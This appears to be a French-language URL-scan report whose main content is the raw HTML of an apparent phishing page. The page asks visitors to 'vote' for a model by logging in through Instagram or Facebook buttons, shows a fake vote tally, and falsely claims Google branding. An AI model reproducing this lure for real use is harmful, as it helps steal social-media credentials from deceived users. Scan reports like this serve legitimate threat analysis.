- ID de l'analyse :
- 3c6b269f-8557-4a36-90f3-0fad8654eae8Terminée
- URL soumise :
- https://appisialpip.onrender.com/
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 3 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Messages de journal de console : 1 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="robots" content="noindex">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Facebook Meta Tags -->
<meta property="og:url" content="">
<meta property="og:type" content="website">
<meta property="og:title" content="Vote your favourite model">
<meta property="og:description" content="">
<meta property="og:image" content="http://helpmigrow.epizy.com/images/05EA6B39-B9C3-4A1A-8009-17EF8306892F.jpeg">
<!-- Twitter Meta Tags -->
<meta name="twitter:card" content="summary_large_image">
<meta property="twitter:domain" content="">
<meta property="twitter:url" content="">
<meta name="twitter:title" content="Vote your favourite model">
<meta name="twitter:description" content="">
<meta name="twitter:image" content="images/05EA6B39-B9C3-4A1A-8009-17EF8306892F.jpeg">
<!-- Meta Tags Generated via https://www.opengraph.xyz -->
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
}
html {
background: #F1F3FA;
}
.wrapper {
background: white;
width: 80%;
margin: 15% 50%;
transform: translateX(-50%);
border-radius: 5px;
color: dodgerblue;
}
button {
background: #5CB85C;
border-radius: 3px;
color: white;
padding: 5px;
border: 1px solid transparent;
}
ul li {
list-style-type: none;
padding: 10px;
background: white;
color: #5B9BD1;
}
/* .cover {
background: #fffffff5;
height: 100%;
width: 100%;
z-index: 9999;
position: fixed;
top: 0;
left: 0;
display: none;
} */
@media screen and (min-width: 768px) {
.wrapper {
width: 50%;
}
}
</style>
</head>
<body>
<!-- <div class="cover">
<center style='transform: translateY(10em)'><img src="./images/hug.gif" width="30px" >
<p id='loader_text' style="text-align: center; color: #222121; margin-top: 5px">Authenticating...</p>
</center>
</div> -->
<div class="wrapper">
<p style="color: #507392; font-size: 13px; padding: 10px; text-align: center;">PLEASE I NEED YOUR VOTE</p>
<center><img src="images/05EA6B39-B9C3-4A1A-8009-17EF8306892F.jpeg" width="100px" height="100px">
<h4 style="padding: 10px 0; text-overflow: ellipsis; width: 200px; overflow: hidden; color: #507392">Bodypositivity. </h4>
<a href="instagram.html"><button>VOTE WITH <i class="fa fa-instagram"></i></button></a>
<!-- <button id='ig_btn'>VOTE WITH <i class="fa fa-instagram"></i></button> -->
<a href="facebook.html"><button style="background: #D9534F;">VOTE WITH <i class="fa fa-facebook"></i></button></a>
</center><br>
<ul>
<li style="background: #F6F9FB; border-left: 2px solid #5B9BD1; "><i class="fa fa-home"></i> Total Votes: 537 out of 1000</li>
<li style="color: #6f808a86"> <i class="fa fa-check"></i> Total Votes To Win: 463</li>
<a href="" style="text-decoration: none; color: #6f808a86">
<li style="color: #6f808a86"><i class="fa fa-flag"></i> Help</li>
</a>
</ul>
</div>
<h4 style="text-align: center; color: #3f3f3f;">Powered by <span style="color: #5B9BD1;"> google voting system</span></h4>
<!-- <script>
var loader_text = document.getElementById('loader_text');
var cover = document.querySelector('.cover');
var ig_btn = document.getElementById('ig_btn');
ig_btn.addEventListener('click', function() {
cover.style.display = 'block'
setTimeout(() => {
loader_text.textContent = 'Verifying Connection...'
setTimeout(() => {
loader_text.textContent = 'Redirecting...'
setTimeout(() => {
window.location.href = 'home'
}, 2000);
}, 2000);
}, 2500);
})
</script> -->
</body></html>